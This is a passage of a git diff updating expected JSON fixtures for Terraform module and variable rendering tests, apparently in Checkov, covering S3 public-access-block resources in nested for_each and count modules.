@@ -1034,15 +1020,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1050,30 +1035,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -1082,15 +1069,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1098,12 +1084,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1111,17 +1097,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1130,15 +1118,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1146,30 +1133,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -1178,15 +1167,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1194,12 +1182,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1207,17 +1195,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1226,15 +1216,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1242,12 +1231,39 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__address__": "count_var", + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ] + } + }, + { + "foreach_var": { + "__address__": "foreach_var", + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ] } } ] diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json index d8a6f2fa138..20e29ce8752 100644 --- a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json +++ b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json @@ -107,7 +107,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" @@ -123,7 +123,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" 
@@ -155,6 +155,64 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket" + } + }, + { + "bucket2": { + 
"__end_line__": 18, + "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}": { "module": [ { @@ -165,7 +223,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" @@ -181,7 +239,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" 
@@ -213,11 +271,69 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + true + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket" + } + }, + { + "bucket2": { + "__end_line__": 18, 
+ "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], "__address__": "module.s3_module[\"a\"].module.inner_s3_module.bucket2" } @@ -235,7 +351,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -243,7 +359,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -261,13 +378,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } ], "resource": [ @@ -283,7 +400,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -291,7 +408,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -304,18 +422,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } ], "resource": [ @@ -331,7 +449,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -339,7 +457,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -352,18 +471,18 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } ], "resource": [ @@ -379,7 +498,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -387,7 +506,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -400,103 +520,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": 
null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + "" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } ], "resource": [ 
@@ -512,7 +547,7 @@ true ], "bucket": [ - "var.bucket" + "" ], "ignore_public_acls": [ true @@ -520,7 +555,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -533,7 +569,7 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } } ] @@ -542,7 +578,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + "" ], "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.bucket2" } @@ -560,7 +596,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -568,7 +604,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -586,71 +623,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - 
"__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } ], "resource": [ @@ -666,7 +645,7 @@ true ], "bucket": [ - "var.bucket" + true ], "ignore_public_acls": [ true @@ -674,7 +653,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -687,7 +667,7 @@ "type": [ "string" ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } } ] 
@@ -696,7 +676,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + true ], "__address__": "module.s3_module2[1].module.inner_s3_module2.bucket2" } @@ -714,7 +694,7 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true @@ -722,7 +702,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -739,5 +720,32 @@ } } ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ], + "__address__": "count_var" + } + }, + { + "foreach_var": { + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ], + "__address__": "foreach_var" + } + } + ] } } \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf new file mode 100644 index 00000000000..630b9b5e172 --- /dev/null +++ 